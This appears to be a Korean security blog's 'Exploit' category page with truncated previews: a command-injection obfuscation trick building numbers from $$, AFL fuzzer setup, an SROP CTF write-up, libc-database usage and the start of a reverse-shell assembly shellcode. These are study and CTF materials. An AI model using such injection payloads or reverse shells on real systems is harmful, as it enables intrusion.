본문 바로가기

Exploit

(33)
cmd injection linux 운영체제 cmd injection 123456789101112131415161718_1 = "$(( $$/$$ ))"_2 = "$(( ($$/$$)+($$/$$) ))"_3 = "$(( ($$/$$)+($$/$$)+($$/$$) ))"_4 = "$(( ($$/$$)+($$/$$)+($$/$$)+($$/$$) ))"_5 = "$(( ($$/$$)+($$/$$)+($$/$$)+($$/$$)+($$/$$) ))"_6 = "$(( ($$/$$)+($$/$$)+($$/$$)+($$/$$)+($$/$$)+($$/$$) ))"_7 = "$(( ($$/$$)+($$/$$)+($$/$$)+($$/$$)+($$/$$)+($$/$$)+($$/$$) ))"_8 = "$(( ($$/$$)+($$/$$)+($$/$$)..
afl 설치 및 사용 123456789101112131415161718192021222324252627$git clone https://github.com/mirrorer/afl $cd afl $make all --------------기본 설치 완료-------------------- 1. source code base $./afl-gcc -o target target.c 2. binary base QEMU 모드 동작 시켜야함 $cd ./qemu_mode $CPU_TARGET=[core] ./build_qemu_support.sh [ex] CPU_TARGET=i386 ./build_qemu_support.sh 사용 ./afl-fuzz -i seed_folder -o output_folder target_binary [ex]..
SROP SwampCTF 2018 SROP 기본 문제이다. 보안 기법은 모두 꺼져있다. Arch: amd64-64-little RELRO: No RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x400000) text 영역에 rwx권한을 주고 다시 입력을 받게한다. 그리고 입력 받는 주소를 텍스트 영역에 가게하고 텍스트 영역을 쉘코드로 덮는다. 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768#!/usr/bin/env pythonfrom pwn import *import binas..
House of force 보호되어 있는 글입니다.
shellcode extract 보호되어 있는 글입니다.
libc-database 정리 library를 식별할 때 사용하는 libc database에 관해서 정리 git download$git clone https://github.com/niklasb/libc-database.git library downloadpwd : libc-database$./get library search./find [함수] [offset 3바이트] $ubuntu:~/libc-database$ ./find __libc_start_main 540archive-glibc (id libc6_2.23-0ubuntu3_i386)ubuntu-xenial-i386-libc6 (id libc6_2.23-0ubuntu9_i386)archive-glibc (id libc6-i386_2.23-0ubuntu3_amd64)ubuntu-..
Command Injection Sheet 보호되어 있는 글입니다.
REVERSE SHELLCODE Colored by Color Scriptercs12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182838485bits 32 global mainsection .textmain: ;EAX 시스템 콜(system call) 함수 번호;EBX 첫번째 함수 인자;ECX 두번째 함수 인자;EDX 세번째 함수 인자 ; "소켓을 생성"; "sock = socket(AF_INET, SOCK_STREAM, 0)"push BYTE 0x66 ; socketcall 시스템콜 102pop eax ; ea..